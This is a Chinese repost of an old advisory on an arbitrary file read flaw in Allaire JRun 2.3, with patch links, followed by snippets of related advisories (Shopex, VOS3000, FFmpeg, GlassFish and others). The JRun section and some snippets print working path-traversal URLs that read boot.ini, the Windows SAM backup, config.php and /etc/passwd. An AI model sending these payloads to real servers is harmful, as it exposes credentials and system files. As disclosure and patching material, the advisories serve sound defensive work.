Allaire JRUN 2.3 查看任意文件漏洞

涉及程序:
JRUN

描述:
Allaire JRUN 2.3 查看任意文件漏洞

详细:
Allaire 的 JRUN 服务器 2.3上存在多重显示代码漏洞。该漏洞允许攻击者在 WEB 服务器上查看根目录下的任意文件的源代码。
JRun 2.3 使用 Java Servlets 解析各种各样类型的页面(例如:HTML, JSP等等)。基于rules.properties 和 servlets.properties 的文件设置,可能利用URL前缀"/servlet/"调用任何servlet。

它可能使用 Jrun 的 SSIFilter servlet 在目标系统上检索任意的文件。下列 2 个例子显示出能被用来检索任意的文件的 URLs :

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t
est.jsp

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../boot.ini

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../winnt/repair/sam._
http://jrun:8000/servlet/ssifilter/../../test.jsp
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini

http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._

注意:假设JRun在主机“ jrun ”上运行,端口8000。

受影响的系统:
Allaire JRun 2.3.x

解决方案:
下载并安装补丁:
Allaire patch jr233p_ASB00_28_29
http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip
Windows 95/98/NT/2000 and Windows NT Alpha

Allaire patch jr233p_ASB00_28_29tar
http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz
UNIX/Linux patch - GNU gzip/tar

时间: 2024-09-01 10:17:07

Allaire JRUN 2.3 查看任意文件漏洞的相关文章

Apache泄露重写的任意文件漏洞 

Apache 涉及程序: mod_rewrite 描述: Apache泄露重写的任意文件漏洞 详细: 在Apache1.2以及以后的版本中存在一个mod_rewrite模块,它用来指定特殊URLS在网络服务器文件系统上所映射的绝对路径.如果传送一个包含正确表达参数的重写规则,攻击者就可以查看目标主机上的任意文件. 下面举例说明重写规则指令(其中第一行只有是包含漏洞的):RewriteRule /test/(.*) /usr/local/data/test-stuff/$1RewriteRule

Shopex V4.8.4|V4.8.5下载任意文件漏洞

利用前提是程序所应用的数据库服务器而且要是可以外连的,这个很关键. 自己搞站时候遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下. 找到一个漏洞,还是发出来吧. 读取任意文件漏洞: http://www.xx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=. . /. . /config/config.php 复制代码可以连上数据库. mysql -h1.1..1.1 -uuser -ppassuse yourbasename;se

Allaire JRUN 2.3远程执行任意命令漏洞

JRun 涉及程序: JRUN 描述: Allaire JRUN 2.3远程执行任意命令漏洞 详细: Allaire 的 JRUN 服务器 2.3上存在一个安全漏洞,允许远程用户把在 WEB 服务器上的任意文件作为JSP代码编译/执行. 如果URL请求的目标文件使用了前缀"/servlet/",则JSP解释执行功能被激活.这时在用户请求的目标文件路径中使用"../",就有可能访问到 WEB 服务器上根目录以外的文件.在目标主机上利用该漏洞请求用户输入产生的一个文件,

FFmpeg任意文件读取漏洞分析

本文讲的是FFmpeg任意文件读取漏洞分析,6月24号的时候hackerone网站上公布了一个ffmpeg的本地文件泄露的漏洞,可以影响ffmpeg很多版本,包括3.2.2.3.2.5.3.1.2.2.6.8等等. hackerone网站上的漏洞介绍: https://hackerone.com/reports/226756.与之相关联的还有其他几篇hackerone上的漏洞报告:https://hackerone.com/reports/243470.https://hackerone.com

FFMPEG任意文件读取漏洞靶场搭建过程

本文讲的是FFMPEG任意文件读取漏洞靶场搭建过程, 丑化说在前头,我这人有一癖好,就是研究一些已经过时的东西,发一些过时的文章.文章之前就写好了,只是一直没发出来充数.距离FFMPEG任意文件读取漏洞发布的时间已经过去很久了,记得刚出来那会儿国内几个大型的视频网站都有这个问题.靶机是之前为了一个比赛场景搭建的,作为环境搭建的初探者,主要介绍下自己在搭建这个环节过程中遇到的一些坑. 1.  搭建需求 搭建一个FFMPEG任意文件读取漏洞靶场,可用于漏洞练习或者攻防题目. 2.  Win2003下

GlassFish任意文件读取漏洞跟踪

[漏洞描述] 本文讲的是GlassFish任意文件读取漏洞跟踪,GlassFish 是一款用于构建 Java EE的应用服务组件.2015年10月,被爆出通用任意文件读取漏洞.利用这个漏洞,攻击者可读取服务器上任意文件.用户可自行到GlassFish官方网站下载更新修复. [趋势跟踪] 根据我们在全球部署的蜜罐捕获的数据显示,针对GlassFish的攻击从来没有停止过,POC在1月14日 公布之后,攻击达到了顶峰,下图为最近两周蜜罐捕获的攻击趋势. 提取一个月内针GlassFish进行了全网大规

DjangoUEditor 1.9.143任意文件上传漏洞依然存在 黑客可以上传木马 但作者已经停止更新了

DjangoUeditor是将百度开发的富文本编辑器Ueditor移植到Django中的组件,它的使用率还是相当高的.经笔者测试,即便是现在可以下载使用的1.9.143版本中,依然存在着这个漏洞. 虽然这个漏洞距今已经快两年了,但DjangoUeditor于2015年1月17号后,再也没有更新过,见github上作者的说明: DjangoUeditor是什么 Django是Python世界最有影响力的web框架.DjangoUeditor是一款可以在Django应用中集成百度Ueditor HT

某语音网关系统任意文件读取漏洞

-,-偶遇 昆石网络技术有限公司VOS3000虚拟运营支撑系统 任意文件读取漏洞 众测时偶遇的.. 直接上案例吧 **.**.**.**/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd http://**.**.**.**/%c0%ae%c0%ae/%c0%ae%c

ASP.NET惊爆新安全漏洞 攻击者可访问任意文件

微软安全响应中心近日发布最新安全预警, 提醒广大ASP.NET用户防范一处新安全漏洞.攻击者可利用存在于ASP.NET加密模块的一处最新漏洞访问到包括web.config在内的任何文件. 此漏洞存在于ASP.NET所有已发布的版本中,其影响程度不容小视. 目前尚无补丁发布.请广大开发和维护人员加强防范. 据悉, ASP.Net 加密模块中新公开的漏洞可使攻击者解密并篡改任意加密数据. 如果 ASP.Net 应用程序使用的是 ASP.Net 3.5 SP1 或更高版本,攻击者可以使用此加密漏洞请求